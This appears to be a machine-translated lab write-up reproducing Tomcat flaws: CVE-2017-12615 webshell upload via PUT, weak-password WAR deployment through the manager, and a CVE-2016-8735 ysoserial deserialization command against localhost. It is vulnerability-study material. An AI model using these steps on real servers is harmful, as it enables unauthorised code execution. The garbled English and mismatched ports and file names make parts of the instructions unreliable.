TomCat Middleware vulnerability reproduction
Foreword
In the penetration testing process, encounter relatively little php station, so the apache know too little. TomCat middleware station to know a little less, this is his first time to build a test environment vulnerability, so the pit encountered in their own way in a little more. I put myself in the pit down, and hope to help everyone.
Test environment to build
Tomcat installation (installed under windows)
Java environment is installed
JDK installation
Jbk official website to download the installation package: https://www.oracle.com/technetwork/java/javase/downloads/index.html
Follow the prompts to extract from the installation and configuration environment variable. After successful as shown:
Apache Tomcat7.0 installation
Download: http: //www.liangchan.net/soft/download.asp softid = 9366 & downid = 8 & id = 9430?
An entire next line according to the default settings
This need to take note: It is jre directory of java, the wrong installation can not. Installed a direct access: HTTP: // locahost: 8080 is shown below
Vulnerability reproduction
Tomcat Remote Code Execution Vulnerability (CVE-2017-12615)
Vulnerability causes
When (the configuration directory) /web.xml added readonly profile is set to false in the conf the Tomcat, the vulnerability will result in generation, (need to allow put request)
Modify the configuration file before and after comparison (here we need to take note) before the amendment:
The default readonly is true, when readonly is set to false, the file can be manipulated through PUT / DELETE. Need to manually configure readonly, false can be exploit. Modified:
After modifying the configuration file, save and reboot.
PUT protocol (Method): PUT method is a method in the HTTP request. This method is used to request the server to request entity stored at the request of the resource, if the resource request already exists in the server, it will replace the original data with the data in this request, as the latest modified version of the specified resource. If the request specified resource does not exist, create the resource and the data bit request body.
The vulnerability affects version
Apache Tomcat 7.0.0 – 7.0.81
Hazard Vulnerability
Cause the server to remote code to be executed
Vulnerability reproduction
Direct access url: http://127.0.0.1 : 8088 / Use burpsuite Ethereal: PUT directly submit shell.jsp return 404. (I did a stupid comparison in this matter)
FIG contrast, normal prior modifications:
Figure modified :( capture directly into the GET PUT)
Need to be constructed to bypass the file name, there are three ways to bypass:
Upload comparison chart, Figure :( wrong side wasted a lot of time, the beginning could not find a reason)
Upload successful, as shown: (put the agreement to be capitalized, I have been saying why not)
View:
Trojan successfully written, choppers connection.
Remote deploy Tomcat vulnerability
Vulnerability produce
This is a tool JSP / PHP site remote deployment, remote administrators only need to upload a WAR file format, you can publish to the site, while convenient for developers to deploy code, upload Trojans opened the door for the hacker.
Vulnerability detection
By visiting: Http: // localhost: port / manager management address, try weak passwords or default password, if successful landing, there is this vulnerability.
Vulnerability reproduction
- Log Management Interface by weak passwords
- Upload war package
- Then direct access to getshell
Hazard Vulnerability
Intruder Trojan files can be uploaded by constructing war, to control the server.
Bug fixes
Tomcat upgrade to enhance password strength install the appropriate protection software, etc.
Tomcat deserialization vulnerability (CVE-2016-8735)
Test environment to build (not successful)
Apache Tomcat 8.5.2 installation
Tomcat Download: http: //tomcat.apache.org/
Install version 8.0
We need to find the version
Click bin
To find a downloadable version
Direct download extract to a local on it (free installation).
Then run Tomcat, the first method is to set the environment variable startup.bat run a batch file in cmd; I use the second method, run cmd command box in the \ apache-tomcat-8.5.2 bin, run startup.bat. as the picture shows:
It is given, because there is no environment variables jdk
Solution :( I find from the Internet causes and solutions are very clearly written)
https://blog.csdn.net/zhangchao19890805/article/details/50646644
If the port conflict can modify the web port, conf-> server.xml about 69 rows. as the picture shows:
After everything is ready, run startup.bat in cmd command box. As shown in a box will pop up running Tomcat, do not turn off. Directly open on the line in the browser.
Service started successfully.
Jdk1.7.0_80 installation (mentioned before)
Vulnerability Description
The vulnerability with the previous release of Oracle mxRemoteLifecycleListener deserialization vulnerability (CVE-2016-3427) relevant, is the use of a monitoring function JmxRemoteLifecycleListener the lead. And after the official release of Oracle repair, Tomcat failed to repair update caused remote code execution.
The most fundamental reason for the vulnerability is caused by a method using Tomcat JmxRemoteLifecycleListener do when configuring JMX monitoring.
The vulnerability affects version
ApacheTomcat 9.0.0.M1 to 9.0.0.M11
ApacheTomcat 8.5.0 to 8.5.6
ApacheTomcat 8.0.0.RC1 to 8.0.38
ApacheTomcat 7.0.0 to 7.0.72
ApacheTomcat 6.0.0 to 6.0.47
Exploit conditions
JmxRemoteLifecycleListener need to open the external monitor port 10001 and 10002, for remote code execution.
Vulnerability reproduction
The required environment Toolkit:
catalina-jmx-remote.jar:
https://archive.apache.org/dist/tomcat/tomcat-8/v8.5.2/bin/extras/catalina-jmx-remote.jar
groovy-2.3.9.jar:
http://central.maven.org/maven2/org/codehaus/groovy/groovy/2.3.9/groovy-2.3.9.jar
ysoserial.jar:
https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar
Prior to reproduce the vulnerability we need to configure the following points:
conf / server.xml in the 30th line configuration functions enable the port JmxRemoteLifecycleListener listening :( add your own hand, be careful not to port conflicts)
<Listener className="org.apache.catalina.mbeans.JmxRemoteLifecycleListener" rmiRegistryPortPlatform="1001" rmiServerPortPlatform="1002"/>
After you configure the port jmx, we tomcat version corresponding to the extras / directory down Download catalina-jmx-remote.jar and download groovy-2.3.9.jar two jar package. After the download is complete to put in the lib directory.
Then we go to the bin directory catalina.bat modify the script. Adding such a line in front of the Command ExecuteThe Requested comment. (Added manually, note the space)
set CATALINA_OPTS= -Dcom.sun.management.jmxremote.ssl=false -Dcom.sun.management.jmxremote.authenticate=false
The main configuration means that the configuration settings to start tomcat, do not open the remote monitoring jvm information. Setting his ssl link is not enabled and is not used to monitor accounts. Specific configuration can try to understand jmx monitoring the use of the tomcat.
At this point after all the configuration successfully saved, we run tomcat.
Whether passing the 1001 listens local services and RMI port 1002 to run successfully
Monitor success, we began to construct Payload execute the command. First, the old routine bomb calculators.
Payload: java -cp ysoserial-master-v0.0.4.jar ysoserial.exploit.RMIRegistryExploit localhost 10001 Groovy1 calc.exe
No bomb successful (with someone else's map, but the steps right), the previous steps are correct is playing out. I may be the reason java environment.